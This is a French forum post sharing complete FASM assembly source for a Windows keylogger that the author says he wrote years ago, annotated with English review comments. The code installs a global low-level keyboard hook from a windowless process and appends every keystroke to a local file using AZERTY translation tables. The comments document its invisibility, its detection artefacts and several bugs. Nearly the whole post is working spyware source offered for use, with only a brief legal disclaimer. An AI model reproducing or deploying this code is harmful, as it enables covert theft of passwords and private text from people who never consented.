Voici un keylogger tout simple que j'ai créé il y a environ 6 ans.
Il journalise chaque touche enfoncée (un octet par touche, en clair, non chiffré) dans le répertoire courant, dans un fichier qui s'appelle "file".
Si vous voulez qu'il s'appelle autrement, modifiez la chaîne `FilePath1` dans le code.
Le code est à mettre dans un fichier .asm et à compiler avec FASM (Windows 32 bits uniquement : le binaire est un PE qui repose sur un hook clavier global `WH_KEYBOARD_LL` de user32).
La table de correspondance touche → caractère semble codée en dur pour un clavier AZERTY français ; sur une autre disposition, les caractères journalisés seront faux.
Virus total : https://www.virustotal.com/#/file/ca7b0f.../detection (le hash est tronqué dans ce message, le lien n'est donc pas exploitable tel quel).
Rappel : n'utilisez ce programme que sur des machines qui vous appartiennent ou pour lesquelles vous disposez d'une autorisation explicite ; intercepter les frappes d'autrui sans consentement est illégal.
Code :
; Target: 32-bit Windows PE, GUI subsystem (no console window; no window is
; created anywhere in this listing either, so the process is invisible on the desktop).
; Assembler: FASM (flat assembler) with its standard Win32 includes.
format PE GUI 4.0
include 'include/windows/win32a.inc'
;--------------------------------------------------
; One section holds both code and data, mapped readable+writeable+executable.
; NOTE(review): an RWX section violates W^X and is a common heuristic flag for
; packers/malware scanners; a conventional build splits .text / .data.
section '.flat' readable writeable executable
;--------------------------------------------------
; Process entry point: Injection installs the hook and pumps messages (see below).
entry Injection
; Injection -- program entry point (FASM proc, no parameters).
;  1. hInstance = GetModuleHandle(NULL); jumps to `exit` (ExitProcess) if it is 0.
;  2. Installs a global low-level keyboard hook (WH_KEYBOARD_LL, thread id 0)
;     whose callback is Keyhook, and stores the returned HHOOK.
;  3. Pumps messages with GetMessage/TranslateMessage/DispatchMessage. Per the
;     Win32 docs a low-level hook callback is delivered on the thread that
;     installed it, so this loop is what keeps Keyhook being called.
;  4. When GetMessage returns 0 (WM_QUIT) the hook is removed and the proc returns.
; NOTE(review): nothing in this listing ever posts WM_QUIT, so in practice the
; loop runs until the process is killed.
; NOTE(review): the SetWindowsHookEx result is not checked; on failure HHOOK is 0
; and the message loop still runs with no hook installed.
proc Injection
invoke GetModuleHandle,0               ; eax = hInstance of this executable
or eax,eax
jz exit                                ; 0 -> ExitProcess(0) (label lives outside this proc)
invoke SetWindowsHookEx,WH_KEYBOARD_LL,Keyhook,eax,0   ; global LL keyboard hook, callback = Keyhook
mov [HHOOK],eax                        ; used by UnhookWindowsHookEx / CallNextHookEx
@@:
invoke GetMessage,msg,NULL,0,0         ; blocks until a message arrives
or eax,eax
jz @f                                  ; 0 = WM_QUIT -> unhook and leave
                                       ; NOTE(review): -1 (error) is non-zero and simply loops again
invoke TranslateMessage,msg
invoke DispatchMessage,msg
jmp @b
@@:
invoke UnhookWindowsHookEx,[HHOOK]
ret                                    ; returns to the loader's thread-start stub; no ExitProcess on this path
endp
; Keyhook -- LowLevelKeyboardProc callback (stdcall: nCode, wParam, lParam).
; Called by user32 for every low-level keyboard event while the hook is installed.
; Behaviour, as implemented below:
;  * ignores anything but nCode == HC_ACTION and key-down events
;    (wParam == WM_KEYDOWN or WM_SYSKEYDOWN); key-up is never logged;
;  * reads vkCode from the KBDLLHOOKSTRUCT that lParam points to;
;  * picks a translation table from the modifier state
;    (AltGr -> altgrcase, Shift or Caps Lock -> uppercase, otherwise lowercase);
;  * looks the virtual-key code up in `vkcode`; if found, appends the single byte
;    at the same index of the chosen table to the file `FilePath1`;
;  * always finishes by calling CallNextHookEx.
; Register roles: eax = scratch / vk code, esi = chosen table, edi = vkcode scan
; pointer, ecx = scan counter.
; NOTE(review): esi and edi are callee-saved under Win32 stdcall but are
; overwritten here without being preserved (no `uses esi edi`); user32 is the
; caller, so this relies on the caller not needing them afterwards.
; Detection artefacts visible from this code: a global WH_KEYBOARD_LL hook owned
; by a windowless GUI process, and one open/seek/write/close of the same file
; per keystroke.
proc Keyhook nCode,wParam,lParam
cmp [nCode],HC_ACTION
jnz callnexthook                       ; only HC_ACTION carries key data
cmp [wParam],WM_SYSKEYDOWN             ; key pressed together with Alt
jz @f
cmp [wParam],WM_KEYDOWN                ; plain key press
jnz callnexthook                       ; key-up and anything else: pass through
@@:
mov eax,[lParam]                       ; eax = KBDLLHOOKSTRUCT*
; Assembly-time overlay of the KBDLLHOOKSTRUCT fields at [eax]; emits no code.
virtual at eax
_vkCode dd ?
_scanCode dd ?
_flags dd ?
_time dd ?
_dwExtraInfo dd ?
end virtual
mov eax,[_vkCode]                      ; virtual-key code of the key pressed
mov [vkCode],eax
; ---- choose the translation table from the modifier state ----
; GetKeyState returns a SHORT whose high-order bit is set while the key is down.
; The code tests ah == 0xFF (i.e. a negative value); that matches what
; GetKeyState is commonly observed to return for a held key, but the documented
; contract is only the high bit -- `test ah,0x80` would be the documented test.
mov esi,lowercase                      ; default table
invoke GetKeyState,0xa5                ; 0xA5 = VK_RMENU (right Alt / AltGr)
cmp ah,0xff
jnz @f
mov esi,altgrcase                      ; AltGr held -> altgrcase (overridden by Shift/Caps below)
@@:
invoke GetKeyState,0xa0                ; 0xA0 = VK_LSHIFT
cmp ah,0xff
jz @f
invoke GetKeyState,0xa1                ; 0xA1 = VK_RSHIFT
cmp ah,0xff
jz @f
invoke GetKeyState,0x14                ; 0x14 = VK_CAPITAL (Caps Lock)
cmp ax,0x0001                          ; whole word == 1: toggled on AND not currently held
jnz Keyscan
@@:
mov esi,uppercase                      ; Shift or Caps Lock -> uppercase (Shift+Caps is NOT inverted)
; ---- look the virtual-key code up in `vkcode` ----
Keyscan:
mov eax,[vkCode]                       ; al = low byte of the vk code to find
mov edi,vkcode
xor ecx,ecx
add cl,63                              ; scan at most 63 bytes = the whole table incl. its 0 terminator
cld
repne scasb                            ; stops at the first byte == al; ecx = 63 - (index+1)
or cl,cl
jz callnexthook                        ; not found (or only the terminator matched) -> not logged
sub cl,63                              ; cl = -(index+1)
not cl                                 ; cl = index   (~(-(i+1)) == i)
add si,cx                              ; esi = table + index
; NOTE(review): `add si,cx` is a 16-bit add -- no carry into the upper half of
; esi -- so if the table straddles a 64 KiB boundary the lookup reads the wrong
; byte. `add esi,ecx` would be the safe form (the upper bits of ecx are 0 here).
; NOTE(review): `altgrcase` holds only 21 entries while `vkcode` holds 62, so
; with AltGr any index >= 21 reads past that table into what follows it (see
; the data section).
lodsb                                  ; al = translated character (0x00 entries are written as NUL, not skipped)
mov [writebuf],al
; ---- append the byte to the log file ----
; The file is reopened, appended to and closed for every keystroke. The path is
; relative ("file"), so the log lands in the process's current directory, in clear.
; NOTE(review): the CreateFile result is not checked; on failure
; (INVALID_HANDLE_VALUE) SetFilePointer/WriteFile/CloseHandle run on a bad handle.
invoke CreateFile,FilePath1,GENERIC_WRITE,NULL,NULL,\
OPEN_ALWAYS,FILE_ATTRIBUTE_NORMAL,NULL
mov [hFile1],eax
invoke SetFilePointer,[hFile1],0,0,FILE_END   ; seek to end (append)
invoke WriteFile,[hFile1],writebuf,0x1,BytesWrite,NULL   ; exactly one byte per key
invoke CloseHandle,[hFile1]
callnexthook:
; NOTE(review): CallNextHookEx takes four arguments (hhk, nCode, wParam, lParam)
; but only three are pushed here, so the next hook in the chain receives
; nCode = wParam, wParam = lParam and lParam = whatever sits above on the stack.
; The resulting stack imbalance is presumably masked by FASM's proc epilogue
; (esp restored from ebp), so it does not crash; it only corrupts what
; downstream hooks see.
invoke CallNextHookEx,[HHOOK],[wParam],[lParam]
ret
endp
; Reached only from Injection when GetModuleHandle returns 0; terminates the process.
exit:
invoke ExitProcess,0
;-----------------------|data|-------------------------
; Mutable state and lookup tables live in the same RWX section as the code.
msg MSG                                ; message buffer for the GetMessage loop in Injection
dwthread dd 0                          ; not referenced anywhere in this listing
HHOOK dd 0                             ; handle returned by SetWindowsHookEx
vkCode dd 0                            ; last virtual-key code seen by Keyhook
cmpt rd 1                              ; not referenced anywhere in this listing
FilePath1 db 'file',0                  ; log file path; relative, i.e. current directory -- change the name here
hFile1 dd 0                            ; handle from CreateFile (reopened on every keystroke)
writebuf rb 5                          ; only byte 0 is used (one character per keystroke)
BytesWrite dd 0                        ; lpNumberOfBytesWritten for WriteFile
; Translation tables. All three are indexed by the position of the virtual-key
; code in `vkcode` (last table below): vkcode[i] -> lowercase[i] / uppercase[i] / altgrcase[i].
; The mappings appear to target a French AZERTY layout (e.g. VK 0x31 '1' -> '&',
; VK 0x32 '2' -> 0xE9 'e-acute', AltGr+'0' -> '@') and store single bytes in a
; Windows-1252-style encoding; on any other keyboard layout the logged characters
; will be wrong. VK_RETURN (0x0D) is logged as 0x0A (LF).
; altgrcase: AltGr variants, 21 entries + 0 terminator -- shorter than vkcode
; (62 entries). Keyhook does not bound the index to this table, so AltGr with a
; key at index >= 21 (A..Z, numpad) reads the terminator (0x00) or bytes of the
; `uppercase` table that follows. Entries that are 0x00 are written as a NUL byte.
altgrcase db 0x00,0x00,0xa4,0x00,0x00,0x00,0x00,0x00,\
0x00,0x7d,0x5d,0x00,0x23,0x7b,0x5b,0x7c,\
0x5c,0x7e,0x60,0x5e,0x40,0
; uppercase: Shift / Caps Lock variants, 62 entries + 0 terminator.
uppercase db 0x0a,0x20,0xa3,0x25,0xb5,0x3f,0x2e,0x2f,\
0xa7,0x2b,0xb0,0x31,0x33,0x34,0x35,0x36,\
0x38,0x32,0x37,0x39,0x30,0x41,0x42,0x43,\
0x44,0x45,0x46,0x47,0x48,0x49,0x4a,0x4b,\
0x4c,0x4d,0x4e,0x4f,0x50,0x51,0x52,0x53,\
0x54,0x55,0x56,0x57,0x58,0x59,0x5a,0x30,\
0x31,0x32,0x33,0x34,0x35,0x36,0x37,0x38,\
0x39,0x2a,0x2b,0x2d,0x2e,0x2f,0
; lowercase: default (no modifier) variants, 62 entries + 0 terminator.
lowercase db 0x0a,0x20,0x24,0xf9,0x2a,0x2c,0x3b,0x3a,\
0x21,0x3d,0x29,0x26,0x22,0x27,0x28,0x2d,\
0x5f,0xe9,0xe8,0xe7,0xe0,0x61,0x62,0x63,\
0x64,0x65,0x66,0x67,0x68,0x69,0x6a,0x6b,\
0x6c,0x6d,0x6e,0x6f,0x70,0x71,0x72,0x73,\
0x74,0x75,0x76,0x77,0x78,0x79,0x7a,0x30,\
0x31,0x32,0x33,0x34,0x35,0x36,0x37,0x38,\
0x39,0x2a,0x2b,0x2d,0x2e,0x2f,0
; vkcode: the virtual-key codes that get logged, 62 entries + 0 terminator,
; scanned by Keyhook with `repne scasb` (63 bytes). Order: VK_RETURN, VK_SPACE,
; nine OEM punctuation keys, the digit row in AZERTY order, A..Z, numpad 0..9,
; numpad * + - . / (VK_SEPARATOR 0x6C is deliberately absent). Any key not in
; this table (Tab, Backspace, arrows, function keys, ...) is never logged.
vkcode db 0x0d,0x20,0xba,0xc0,0xdc,0xbc,0xbe,0xbf,\
0xdf,0xbb,0xdb,0x31,0x33,0x34,0x35,0x36,\
0x38,0x32,0x37,0x39,0x30,0x41,0x42,0x43,\
0x44,0x45,0x46,0x47,0x48,0x49,0x4a,0x4b,\
0x4c,0x4d,0x4e,0x4f,0x50,0x51,0x52,0x53,\
0x54,0x55,0x56,0x57,0x58,0x59,0x5a,0x60,\
0x61,0x62,0x63,0x64,0x65,0x66,0x67,0x68,\
0x69,0x6a,0x6b,0x6d,0x6e,0x6f,0
;------------------------|idata|-------------------------
; Import directory. Only kernel32 (GetModuleHandle, CreateFile, SetFilePointer,
; WriteFile, CloseHandle, ExitProcess) and user32 (SetWindowsHookEx, GetMessage,
; TranslateMessage, DispatchMessage, UnhookWindowsHookEx, GetKeyState,
; CallNextHookEx) functions are referenced in this listing. msvcrt
; (clock/printf/sprintf) and Ws2_32 are declared below but never called.
; NOTE(review): FASM's standard import macros normally omit entries that are not
; referenced, so whether msvcrt.dll / Ws2_32.dll appear in the built binary's
; import table has to be checked on the binary itself. Do not infer network
; (exfiltration) capability from this source: there is no socket code here.
data import
library kernel32, 'kernel32.dll',\
msvcrt, 'msvcrt.dll',\
user32, 'user32.dll',\
wsock32, 'Ws2_32.dll'
include 'include/windows/api/kernel32.inc'
include 'include/windows/api/user32.inc'
include 'include/windows/api/wsock32.inc'
import msvcrt,\
clock, 'clock',\
printf, 'printf',\
sprintf, 'sprintf'
end data